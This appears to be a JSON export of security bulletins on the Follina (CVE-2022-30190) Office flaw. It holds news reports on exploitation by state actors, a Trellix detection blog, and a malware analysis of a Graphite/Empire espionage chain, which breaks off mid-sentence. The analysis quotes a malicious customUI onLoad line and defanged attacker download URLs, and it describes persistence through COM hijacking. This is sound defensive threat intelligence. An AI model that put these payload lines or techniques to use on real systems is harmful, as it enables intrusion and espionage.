Word,\" Microsoft said in an advisory for CVE-2022-30190.\n\n\"An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user's rights.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjDwwcRQQLel_buVz-cP2D87KQ9SRU9AxTyvKVy-yD0XyMjUWUJFIiu7fTBhtdu6J7nG76FktwEvqkjodphqnX--IwjAE_tEPQTVOrmlwWn6clHVQN0Ff7NvAu4wTmjsB3-cqjcU7OCOKQCCRGIY7JfsIBzOdqeZZ0DGfE37Z640iuKSDL2OtIBiu2q/s728-e100/hacking.jpg>)\n\nThe tech giant credited crazyman, a member of the [Shadow Chaser Group](<https://twitter.com/ShadowChasing1>), for reporting the flaw on April 12, coinciding with the discovery of the in-the-wild exploit targeting Russian users, indicating the company had been already aware of the vulnerability.\n\nIndeed, according to [screenshots](<https://twitter.com/CrazymanArmy/status/1531117401181671430>) shared by the researcher on Twitter, Microsoft closed the vulnerability submission report on April 21, 2022 stating \"the issue has been fixed,\" while also dismissing the flaw as \"not a security issue\" since it requires a passkey provided by a support technician when starting the diagnostic tool.\n\nBesides releasing detection rules for Microsoft Defender for Endpoint, the Redmond-based company has offered workarounds in its guidance to disable the MSDT URL protocol via a Windows Registry modification.\n\n\"If the calling application is a Microsoft Office application, by default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office, both of which prevent the current attack,\" Microsoft said.\n\nThis is not the first time Microsoft Office protocol schemes like \"ms-msdt:\" have come under the scanner for their potential misuse. Earlier this January, German cybersecurity company SySS [disclosed](<https://blog.syss.com/posts/abusing-ms-office-protos/>) how it's possible to open files directly via specially crafted URLs such as \"ms-excel:ofv|u|https://192.168.1.10/poc[.]xls.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-05-31T05:12:00", "type": "thn", "title": "Microsoft Releases Workarounds for Office Vulnerability Under Active Exploitation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-31T17:53:19", "id": "THN:1EFEC00D867275514EA180819C9EF104", "href": "https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-26T14:15:34", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEges_oQp6YhYMafMFx5Bgh8Fw8z_Kw493RaFfsAEw_JLzOOb54c2i2bgfnW0FkTDBs_MLV-X6J32JSn8EBWja2e8VH9MYvtZfC3m9Xs1Ck2EOk_lIL4zHqZmFa7fbJAAlzH_V51OPs9BCNXC5F1-I_8AXChplDz3fUP8Fz9uaAnTNKyLSMHA_EkxVus/s728-e100/code.jpg>)\n\nA China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called **LOWZERO **as part of an espionage campaign aimed at Tibetan entities.\n\nTargets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan government-in-exile.\n\nThe intrusions involved the exploitation of [CVE-2022-1040](<https://thehackernews.com/2022/06/chinese-hackers-exploited-sophos.html>) and [CVE-2022-30190](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>) (aka \"Follina\"), two remote code execution vulnerabilities in Sophos Firewall and Microsoft Office, respectively.\n\n\"This willingness to rapidly incorporate new techniques and methods of initial access contrasts with the group's continued use of well known and reported capabilities, such as the Royal Road RTF weaponizer, and often lax infrastructure procurement tendencies,\" Recorded Future [said](<https://www.recordedfuture.com/chinese-state-sponsored-group-ta413-adopts-new-capabilities-in-pursuit-of-tibetan-targets>) in a new technical analysis.\n\nTA413, also known as LuckyCat, has been linked to relentlessly targeting organizations and individuals associated with the Tibetan community at least since 2020 using malware such as ExileRAT, Sepulcher, and a malicious Mozilla Firefox browser extension dubbed [FriarFox](<https://thehackernews.com/2021/02/chinese-hackers-using-firefox-extension.html>).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiA6KaN98j8MBSFqaYNe3Dod86yILo_svn3l1ASNt_XF8pjnD-xxQspWUwkZLgODzNBkYLJ_tz2JD7T6amhNIP2_z_Y4h02QRpPA5iEkXLXi2RUK43WPK_MrAE7E8xcSV3rroxTL4wnxq00AUp3OXhrP5XHzbk4BQaHYJYjzWVp0fGAuT-LeC7f5CI6/s728-e100/dll.jpg>)\n\nThe group's exploitation of the Follina flaw was previously [highlighted](<https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html>) by Proofpoint in June 2022, although the ultimate end goal of the infection chains remained unclear.\n\nAlso put to use in a spear-phishing attack identified in May 2022 was a malicious RTF document that exploited flaws in Microsoft Equation Editor to drop the custom LOWZERO implant. This was achieved by employing a [Royal Road RTF weaponizer tool](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), which is widely shared among Chinese threat actors.\n\nIn another phishing email sent to a Tibetan target in late May, a Microsoft Word attachment hosted on the Google Firebase service attempted to leverage the Follina vulnerability to execute a PowerShell command designed to download the backdoor from a remote server.\n\nLOWZERO, the backdoor, is capable of receiving additional modules from its command-and-control (C2) server, but only on the condition that the compromised machine is deemed to be of interest to the threat actor.\n\n\"The group continues to incorporate new capabilities while also relying on tried-and-tested [tactics, techniques, and procedures,\" the cybersecurity firm said.\n\n\"TA413's adoption of both zero-day and recently published vulnerabilities is indicative of [wider](<https://www.technologyreview.com/2022/02/28/1046575/how-china-built-a-one-of-a-kind-cyber-espionage-behemoth-to-last/>) [trends](<https://www.crowdstrike.com/global-threat-report/>) with Chinese cyber-espionage groups whereby exploits regularly appear in use by multiple distinct Chinese activity groups prior to their widespread public availability.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-26T12:14:00", "type": "thn", "title": "Chinese Espionage Hackers Target Tibetans Using New LOWZERO Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1040", "CVE-2022-30190"], "modified": "2022-09-26T13:59:50", "id": "THN:44DD118DC206D25EB4ECAE95173FE16E", "href": "https://thehackernews.com/2022/09/chinese-espionage-hackers-target.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trellix": [{"lastseen": "2022-07-19T00:00:00", "description": "# Countering Follina Attack (CVE- 2022-30190) with Trellix Network Security Platform\u2019s Advanced Detection Features\n\nBy Vinay Kumar and Chintan Shah \u00b7 July 19, 2022\n\n## Executive summary\n\nDuring the end of May 2022, independent security researcher reported a vulnerability (assigned CVE-2022-30190) in Microsoft Support Diagnostic Tool (MSDT), which could be exploited to execute arbitrary code when MSDT is called using URI protocol. The URI protocol **ms-msdt:/** could also be invoked from the malicious word document, which when opened by the victim, would allow malicious code to execute on the target machine with the privileges of the calling application. In response to the reported vulnerability, Microsoft released [the advisory and guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on disabling the MSDT URI protocol. Subsequently, the vulnerability, was patched in the [June security updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) released by Microsoft. Since then, this vulnerability has been found to be exploited by multiple state actors in [targeted attack campaigns](<https://www.bleepingcomputer.com/news/security/windows-msdt-zero-day-now-exploited-by-chinese-apt-hackers/>).\n\nAt Trellix, we are committed to protecting our customers from upcoming and emerging threats on the network inclusive of those that are found being exploited in the wild. Trellix Network Security Platform\u2019s (Trellix NSP) Intrusion Prevention Research Team strives to build advanced detection features , improving product\u2019s overall Threat Detection capabilities.\n\nOver the next few sections of this blog, we will highlight couple of advanced detection features in Trellix NSP, which helps in protecting the customers against this and future attacks of similar nature.\n\n## Introduction \n\nMS Word document exploiting Microsoft Support Diagnostic Tool vulnerability ( CVE- 2022-30190 ) was first found to be [submitted to VT](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/>) on 27th May 2022 from Belarus with the file name **05-2022-0438.doc**. However, the number 0438 turns out to be the Area code of the region **Follina** in Italy and hence the name. Exploit document is not found to be connected to Italy in any way.\n\n Figure 1: Sample submission history on VirusTotal \n\n\nThere is no dearth of instances where one of the MS Office\u2019s core features, Object Linking and Embedding ( OLE ) have been abused as an initial attack vector and CVE-2022-30190 was no different. This was yet another classic example of chaining OLE with another logic flaw to achieve arbitrary code execution on the target machine. Traditionally, Object Linking and Embedding had significantly contributed to building weaponized office exploits, and we believe this will continue to happen. As with previous CVE-2021-40444 and many other exploits, OLE was found to be used for linking the document to the externally hosted object, in this case, html file. \n\n[MS Office Open XML specifications](<https://www.ecma-international.org/publications-and-standards/standards/ecma-376/>) mentions that an Office Open XML document facilitates embedding objects or link to external objects which can be specified via relationships. Any embedded or linked object specified in the container application ( OOXML document in this case ) must be identified by its unique **ProgID** string. As per the specifications, this string must be used to determine the type and the application used to load the object data. An excerpt from the document specifications is as shown below:\n\n Figure 2: Specs on Embedded objects \n\n\nAs documented in the [ISO-29500-4 specifications](<https://standards.iso.org/ittf/PubliclyAvailableStandards/c071692_ISO_IEC_29500-4_2016.zip>) ST_OLEType defines the type of the OLE object in **document.xml**, either linked or embedded and the **ProgID=\u201dhtmlfile\u201d** indicates the type of linked object data. As shown in the CVE-2022-30190 exploit document below, **document.xml.rels** file with Type attribute specifying relationship as \u201coleObject\u201d, **Target** attribute set to the OLE object link and **TargetMode** set as external. This allows the crafted document to link to the externally hosted potentially malicious object and invoke the respective protocol handlers for rendering the object which could lead to the exploitation of potential logic flaws in object renderers.\n\n Figure 3: Structure of exploit document \n\n\nAs we notice the document.xml.rels file, it contains an external reference to the malicious domain for retrieving the html file :\n\n**hxxps://www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html!**. Hosted html file on this domain contains script block with commented lines. This is required for making the HTML file sufficiently sized ( precisely greater than 4KB ) to be able to get it processed and rendered by mshtml.dll. \n\n Figure 4: downloaded html file from server \n\n\nSubsequently, script tries to invoke PCWDiagnostic package using MSDT URI protocol handler with multiple arguments out of which one argument is IT_BrowseForFile which can take embedded PowerShell script within $( ) as an argument , resulting into code execution. PowerShell script is Base64 encoded and decoded form is of the script is as shown below. \n\n Figure 5: Decoded PowerShell script \n\n\nAs we see in the decoded payload, the script is intended to run the malicious rgb.exe on the target system. Summarizing the sequence involved in the attack:\n\n * Malicious MS office document with linked object is delivered to the victim possibly, as a part of phishing campaign.\n * On clicking the document, malicious HTML script is rendered, leading to arbitrary code execution on the affected system. \n\nWindows system registers innumerable number of URI protocol handlers which could be potentially abused to exploit similar flaws. For instance, [search-ms](<https://docs.microsoft.com/en-us/windows/win32/search/getting-started-with-parameter-value-arguments>) URI protocol handler , used to query windows search indexing feature can be abused by the attackers to connect to the remote SMB share on the attacker-controlled server. However, it does not directly lead to code execution as it requires multiple levels of user interaction, but a query can be crafted to lure the users to execute legitimate looking executables as shown below. Both these of URI protocol attacks were first [reported here](<https://benjamin-altpeter.de/shell-openexternal-dangers/>).\n\n Figure 6: search-ms query to connect to remote location \n\n\n**How Trellix NSP protects against Follina**\n\nTrellix NSP has been one of the most advance and mature IPS in the security industry. Over a period, we developed some of the cutting-edge features to deal with complex attack scenarios which involved handling encoding, compressions, and complex file formats. **Microsoft Office Deep File Inspection** and **Multi Attack ID Correlation** being some of these. We use combination of these advance capabilities to detect entire attack cycle. In the following sections, we will try to understand how Trellix Network Security Platform\u2019s advanced inspection capabilities highlighted above can help correlate multiple low or medium severity events to detect phases in the attack cycle, thereby raising overall confidence level.\n\n**Microsoft Open Office XML(OOXML) file format**\n\nOLE File format which was traditionally used in Microsoft office is replaced with Office open xml. Office Open XML (OOXML) is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations, and word processing documents. In a nutshell this means that the whole document is contained in a zip package. Multiple files and directories together form the document. There are directories like _[Content_Types].xml , _rels, docProps_, which are basic part of all office zip packages, and then there is a directory specific to document type _(word directory for docx, xl and ppt directory for xlsx and pptx respectively)_. For each of the document type the specific directory would contain different files limited to the type. Like in case of a docx type, the \u2018word\u2019 directory contains document.xml file which has the core content of the document. Here is a brief overview about important files under these directories: \n\n**[Content_Types].xml** \nThis file contains the MIME type information for parts of the package. It uses defaults for certain file extensions and overrides for parts specified by Internationalized Resource Identifier.\n\n**_rels** \nThis directory contains the relationship information for files within the package.\n\n**_rels/.rels** \nThis is the location where applications look first to find the package relationships.\n\n**docProps/core.xml** \nThis file contains the core properties for any Office Open XML document.\n\n**word/document.xml** \nThis file is the main part for any Word document.\n\nZip file format specification specifies that a file in the zip archive is stored in a file record structure. For each file in the zip archive, there is a corresponding entry of this structure. \n\n[local file header 1] \n[file data 1] \n[data descriptor 1] \n. \n. \n. \n[local file header n] \n[file data n] \n[data descriptor n] \n \n[archive decryption header] \n[archive extra data record] \n[central directory header 1] \n. \n. \n. \n[central directory header n] \n[zip64 end of central directory record] \n[zip64 end of central directory locator] \n[end of central directory record]\n\nThese structures are placed one after another, structure starts with local file header followed by optional Extra Data Fields and file data (optionally compressed/optionally encrypted). Local header contains details about the file data, encryption/compression mechanism along with filename, file size and few more things.\n\n**Local file header**\n\nOffset | Byte | Description \n---|---|--- \n0 | 4 | Local file header signature # 0x04034b50 (read as a little-endian number) \n4 | 2 | Version needed to extract (minimum) \n6 | 2 | General purpose bit flag \n8 | 2 | Compression method \n10 | 2 | File last modification time \n12 | 2 | File last modification date \n14 | 4 | CRC-32 \n18 | 4 | Compressed size \n22 | 4 | Uncompressed size \n26 | 2 | File name length (n) \n28 | 2 | Extra field length (m) \n30 | n | File Name \n30+n | m | Extra Field \n0 | 4 | Local file header signature # 0x04034b50 (read as a little-endian number) \n4 | 2 | Version needed to extract (minimum) \n6 | 2 | General purpose bit flag \n \n \n\n\nFor Microsoft documents, deflate compression is used commonly. In a nutshell, the files which constitutes the document are stored in possibly encrypted/compressed format inside the zip package. In the figure below, we dissect this structure for document.xml file present under word directory with a hex editor (010 editor) with zip parsing capabilities which will help us to investigate the details \u2013\n\n Figure 7: Structure for document.xml \n\n\n**Need for deep file inspection**\n\nWe have seen in the past that different vulnerabilities may require the IPS devices to examine the content of the different files present inside zip package. Same is the case with Follina. As explained earlier, this vulnerability abuses Microsoft OOXML **Object Linking and Embedding** functionality linking a file to external resource via the relationship file to load malicious content. Hence it requires the detection device to check the external references used in word/rels/document.xml.rels file. \n\n Figure 8: Structure of document.xml.rels \n\n\nSince this file is present, as a compressed entity in the zip archive, a meaningful detection with IPS cannot be done until the file is decompressed. With NSP\u2019s unique in industry capability, known as Deep File inspection, this is possible. \n\nThis is implemented using protocol parsing capability of the NSP. The local file header structure for the specific file is parsed and the compressed data of the file is decoded. This feature can be used by enabling it from the inspection option policy.\n\n Figure 9: Policy configuration to enable MS Office Deep File Inspection \n\n\n_For more details, please refer to NSP documentation_\n\n**Some of the key highlights: deep file inspection **\n\n * This feature helps to decompress the file contents inline; the complete file is not required to be downloaded for inspection \n * It also gives the flexibility to decompress only the content of a selected file (individual file present inside zip achieve), yielding better performance since the whole zip archive is not required to be decompressed .\n * The individual files (which are part of zip package) can be controllably decompressed by specifying byte limit per file. This plays a great role in improving performance while doing inline inspection.\n\nTrellix NSP Attack ID **0x452a8400 - HTTP: OLE Object Linking Detected in OOXML File** \u2013 uses the Microsoft Office Deep file inspection feature to detect signs of external object linking. However, just checking for external OLE references will not be sufficient until it is ascertained that the external URI does the malicious activity. Since we know that external URI loads the HTML which invokes the MSDT handler in a malicious fashion. \n\nInvoking MSDT through HTML content is detected by Trellix NSP Attack ID **0x452ac200 \u2013 HTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190)**\n\n**Detecting the attack chain using multi attack ID Correlation**\n\nThe attack visualization is better when the dots can be connected between different stages of the attack. Multi Attack ID Correlation capability helps achieve this by correlating multiple attacks. \n\nTrellix NSP Attack ID **0x43f02000 HTTP: Microsoft Support Diagnostic Tool RCE Vulnerability (CVE-2022-30190)** utilizes this capability and correlates \u201cHTTP: OLE Object Linking Detected in OOXML File (0x452a8400) \u201d and \u201cHTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190) (0x452ac200)\u201d to generate corelated attack event. \n\nThe alert generated using Multi AID correlation is of high confidence and severity and helps security admins to take further actions. This feature is built into Trellix NSP by default and there is no extra configuration required to enable it. \n\n**Some of the key highlights: multi attack ID Correlation **\n\n * Two or more attacks can be correlated \n * Provides capability to quarantine the attacker (configurable from the policy)\n * Correlation using attributes like \u2013 \n * source-IP/destination IP: This attribute helps correlating attack originating from same source IP and/or targeted to the same destination IP .\n * Lifetime: max time interval in which all correlation signature event should occur\n * Threshold: Detection of attack happening repeatedly in a specific period.\n\nWith these strong correlation capabilities for the complete attack cycle, Trellix Network Security Platform\u2019s Threat Detection solution balances the effectiveness and performance extremely well. The Trellix NSP research and Engineering team actively monitors and keeps an eye on emerging threat patterns ,builds the features and capabilities to enhance overall detection efficacy of the Intrusion Prevention System. \n\n## Conclusion \n\nWe have seen multiple vulnerabilities in the past using exploitation techniques similar in nature and this is yet another addition to the series. In our previous blog, outlining the current state of memory corruption vulnerabilities and the challenges faced in exploiting them, we also highlighted the exploitation strategies of the future and the **Follina** attack very well validates our prediction. While exploiting different classes of memory corruption vulnerabilities can be eliminated by introducing mitigations as either operating system or hardware level, vulnerabilities exploiting design flaws will remain a challenge. Perimeter and endpoint security solutions will have to evolve to address those challenges by introducing the innovative inspection and detection techniques alongside applying secure software design and development practices during application development. \n", "cvss3": {}, "published": "2022-07-19T00:00:00", "type": "trellix", "title": "Countering Follina Attack (CVE- 2022-30190) with Trellix Network Security Platform\u2019s Advanced Detection Features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-07-19T00:00:00", "id": "TRELLIX:D8DB23FAEBC16DCFBC54050BEBBF650D", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/countering-follina-attack-with-network-security-platforms-advanced-detection-features.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-25T00:00:00", "description": "# Prime Minister\u2019s Office Compromised: Details of Recent Espionage Campaign\n\nBy Marc Elias \u00b7 January 25, 2022\n\nA special thanks to Christiaan Beek, Alexandre Mundo, Leandro Velasco and Max Kersten for malware analysis and support during this investigation.\n\n#### Executive Summary\n\nOur Advanced Threat Research Team have identified a multi-stage espionage campaign targeting high-ranking government officials Western Asia and Eastern Europe. As we detail the technical components of this attack, we can confirm that we have undertaken pre-release disclosure to the victims and provided all necessary content required to remove all known attack components from their environments. \n\nThe infection chain starts with the execution of an Excel downloader, most likely sent to the victim via email, which exploits an MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-defender-blog-mshtml-cve-2021-40444/>)) to execute a malicious executable in memory. The attack uses a follow-up piece of malware called Graphite because it uses Microsoft\u2019s Graph API to leverage OneDrive as a command and control server\u2014a technique our team has not seen before. Furthermore, the attack was split into multiple stages to stay as hidden as possible. \n\nCommand and control functions used an Empire server that was prepared in July 2021, and the actual campaign was active from October to November 2021. The below blog will explain the inner workings, victimology, infrastructure and timeline of the attack and, of course, reveal the IOCs and MITRE ATT&amp;CK techniques.\n\nA number of the attack indicators and apparent geopolitical objectives resemble those associated with the previously uncovered threat actor APT28. While we don\u2019t believe in attributing any campaign solely based on such evidence, we have a moderate level of confidence that our assumption is accurate. That said, we are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were setup.\n\nTrellix customers are protected by the different McAfee Enterprise and FireEye products that were provided with these indicators.\n\n#### Analysis of the Attack Process\n\nThis section provides an analysis of the overall process of the attack, beginning with the execution of an Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-defender-blog-mshtml-cve-2021-40444/>)) vulnerability. This is used to execute a malicious DLL file acting as a downloader for the third stage malware we called Graphite. Graphite is a newly discovered malware sample based on a OneDrive Empire Stager which leverages OneDrive accounts as a command and control server via the Microsoft Graph API. \n\nThe last phases of this multi-stage attack, which we believe is associated with an APT operation, includes the execution of different Empire stagers to finally download an Empire agent on victims\u2019 computers and engage the command and control server to remotely control the systems.\n\nThe following diagram shows the overall process of this attack.\n\n **Figure 1. Attack flow**\n\n### First Stage \u2013 Excel Downloaders\n\nAs suggested, the first stage of the attack likely uses a spear phishing email to lure victims into opening an Excel file, which goes by the name \u201cparliament_rew.xlsx\u201d. Below you can see the identifying information for this file:\n\nFile type | Excel Microsoft Office Open XML Format document \n---|--- \nFile name | parliament_rew.xlsx \nFile size | 19.26 KB \nCompilation time | 05/10/2021 \nMD5 | 8e2f8c95b1919651fcac7293cb704c1c \nSHA-256 | f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4 \n \n **Figure 2. Decoy text observed in the Excel file**\n\nIn analyzing this file\u2019s structure, we observed that it includes a folder named \u201ccustomUI\u201d that contains a file named \u201ccustomUI.xml\u201d. Opening this file with a text editor, we observed that the malicious document uses the \u201cCustomUI.OnLoad\u201d property of the OpenXML format to load an external file from a remote server: \n\n** &lt;customUI xmlns**=\"http://schemas.microsoft.com/office/2006/01/customui\" onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'&gt; &lt;/customUI&gt;\n\nThis technique allows the attackers to bypass some antivirus scanning engines and office analysis tools, decreasing the chances of the documents being detected. \n\nThe downloaded file is again an Excel spreadsheet, but this time it is saved using the old Microsoft Office Excel 97-2003 Binary File Format (.xls). Below you can see the identifying information of the file:\n\nFile type | Microsoft Office Excel 97-2003 Binary File Format \n---|--- \nFile name | parliament_rew.xls \nFile size | 20.00 KB \nCompilation time | 05/10/2021 \nMD5 | abd182f7f7b36e9a1ea9ac210d1899df \nSHA-256 | 7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a \n \nAnalyzing the metadata objects, we can identify that the creator was using the codepage 1252 used in Western European countries and the file was created on October 5th, 2021.\n\n **Figure 3. Document metadata**\n\nLater, we analyzed the OLE objects in the document and discovered a Linked Object OLEStream Structure which contains a link to the exploit of the CVE-2021-40444 vulnerability hosted in the attackers\u2019 server. This allows the document to automatically download the HTML file and subsequently call the Internet Explorer engine to interpret it, triggering the execution of the exploit.\n\n **Figure 4. Remote link in OLE object**\n\nIn this blog post we won\u2019t examine the internals of the CVE-2021-40444 vulnerability as it has already been publicly explained and discussed. Instead, we will continue the analysis on the second stage DLL contained in the CAB file of the exploit.\n\n#### Second Stage \u2013 DLL Downloader\n\nThe second stage is a DLL executable named fontsubc.dll which was extracted from the CAB file used in the exploit mentioned before. You can see the identifying information of the file below:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | fontsubc.dll \nFile size | 88.50 KB \nCompilation time | 28/09/2021 \nMD5 | 81de02d6e6fca8e16f2914ebd2176b78 \nSHA-256 | 1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40 \n \nThis file exports a function called \u201cCPlApplet\u201d that Windows recognizes as a control panel application. Primarily, this acts a downloader for the next stage malware which is located at hxxps://wordkeyvpload[.]net/keys/update[.]dat using COM Objects and the API \u201cURLOpenBlockingStreamW\u201d. \n\n **Figure 5. Download of next stage malware**\n\nAfter downloading the file, the malware will decrypt it with an embedded RSA Public Key and check its integrity calculating a SHA-256 of the decrypted payload. Lastly, the malware will allocate virtual memory, copy the payload to it and execute it.\n\n **Figure 6. Payload decryption and execution**\n\nBefore executing the downloaded payload, the malware will compare the first four bytes with the magic value DE 47 AC 45 in hexadecimal; if they are different, it won\u2019t execute the payload.\n\n **Figure 7. Malware magic value**\n\n#### Third Stage \u2013 Graphite Malware\n\nThe third stage is a DLL executable, never written to disk, named dfsvc.dll that we were able to extract from the memory of the previous stage. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | dfsvc.dll \nFile size | 24.00 KB \nCompilation time | 20/09/2021 \nMD5 | 0ff09c344fc672880fdb03d429c7bda4 \nSHA-256 | f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231 \n \nWe named this malware Graphite due to the use of the Microsoft Graph API to use OneDrive as command and control. It is very likely that the developers of Graphite used the Empire OneDrive Stager as a reference due to the similarities of the functionality and the file structure used in the OneDrive account of the actors.\n\n **Figure 8. Empire OneDrive stager API requests**\n\nGraphite starts by creating a mutex with the hardcoded name \u201c250gHJAWUI289382s3h3Uasuh289di\u201d to avoid double executions, decrypt the strings and resolve dynamically the APIs it will use later. Moreover, it will calculate a bot identifier to identify the infected computer which is a CRC32 checksum of the value stored in the registry key \u201cHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\ Cryptography\\MachineGuid\u201d.\n\n **Figure 9. Graphite initializations**\n\nNext, the malware will create a thread to monitor the execution of tasks and upload its results to the OneDrive account. Result files will be uploaded to the \u201cupdate\u201d folder of the attackers\u2019 OneDrive account. \n\n **Figure 10. Thread to monitor task results**\n\nAfter that, the malware will enter into an infinite loop where every 20 minutes it will obtain a new OAuth2 token to use with the Microsoft Graph API requests and determine if there are new tasks to execute in the \u201ccheck\u201d folder of the attackers\u2019 OneDrive account. \n\n **Figure 11. Request of new OAuth2 token**\n\nOnce it obtained a valid OAuth2 token, reconnaissance data is gathered containing the following information from the victims\u2019 systems:\n\n * Running processes\n * .NET CLR version from PowerShell\n * Windows OS version\n\nThe data is compressed using the LZNT1 algorithm and encrypted with a hardcoded AES-256-CBC key with a random IV. The operator tasks are encoded in the same way. Finally, the file containing the system information is uploaded to the folder \u201c{BOT_ID}/update\u201d in OneDrive with a random name.\n\n **Figure 12. Graphite encoding data**\n\nGraphite will also query for new commands by enumerating the child files in the \"check\" subdirectory. If a new file is found, it will use the Graph API to download the content of the file and decrypt it. The decrypted tasks have two fields; the first one is a unique identifier of the task and the second one specifies the command to execute.\n\nThe command value \u201c1\u201d will instruct the malware to send the system information to the command and control again, which is the attackers\u2019 OneDrive. The command value \u201c2\u201d indicates that the decrypted task is a shellcode, and the malware will create a thread to execute it.\n\n **Figure 13. Graphite commands**\n\nIf the received task is a shellcode, it will check the third field with the magic value DE 47 AC 45 in hexadecimal and, if they are different, it won\u2019t execute the payload. The rest of the bytes of the task is the shellcode that will be executed. Lastly, the task files are deleted from the OneDrive after being processed.\n\n **Figure 14. Decrypted operator task**\n\nThe diagram below summarizes the flow of the Graphite malware.\n\n **Figure 15. Graphite execution diagram**\n\n#### Fourth Stage \u2013 Empire DLL Launcher Stager\n\nThe fourth stage is a dynamic library file named csiresources.dll that we were able to extract from a task from the previous stage. The file was embedded into a Graphite shellcode task used to reflectively load the executable into the memory of the process and execute it. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | csiresources.dll \nFile size | 111.00 KB \nCompilation time | 21/09/2021 \nMD5 | 138122869fb47e3c1a0dfe66d4736f9b \nSHA-256 | 25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9 \n \nThe sample is a generated Empire DLL Launcher stager that will initialize and start the .NET CLR Runtime into an unmanaged process to execute a download-cradle to stage an Empire agent. With that, it is possible to run the Empire agent in a process that\u2019s not PowerShell.exe.\n\nFirst, the malware will check if the malware is executing from the explorer.exe process. If it is not, the malware will exit.\n\n **Figure 16. Process name check**\n\nNext, the malware will try to find the file \u201cEhStorShell.dll\u201d in the System32 folder and load it. With this, the malware makes sure that the original \u201cEhStorShell.dll\u201d file is loaded into the explorer.exe context.\n\n **Figure 17. Loading EhStorShell.dll library**\n\nThe previous operation is important because the follow-up malware will override the CLSID \u201c{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\u201d to gain persistence in the victims\u2019 system, performing a COM Hijacking technique. The aforementioned CLSID corresponds to the \u201cEnhanced Storage Shell Extension DLL\u201d and is handled by the file \u201cEhStorShell.dll\u201d.\n\nComing up next, the malware will load, initialize and start the .NET CLR Runtime, XOR decrypt the .NET next stage payload and load it into memory. Lastly, it will execute the file using the .NET Runtime.\n\n **Figure 18. Decryption of next stage malware**\n\n#### Fifth Stage \u2013 Empire PowerShell C# Stager\n\nThe fifth stage is a 